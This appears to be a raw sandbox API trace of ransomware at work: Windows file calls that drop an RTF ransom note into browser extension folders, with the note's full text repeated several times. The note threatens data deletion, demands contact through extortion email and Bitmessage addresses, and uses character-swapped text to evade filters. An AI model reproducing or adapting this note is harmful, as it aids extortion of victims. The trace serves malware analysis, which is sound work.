\\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.347] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.347] CloseHandle (hObject=0x294) returned 1 [0273.347] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\#readme_eman#.rtf")) returned 0xffffffff [0273.347] GetLastError () returned 0x2 [0273.347] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 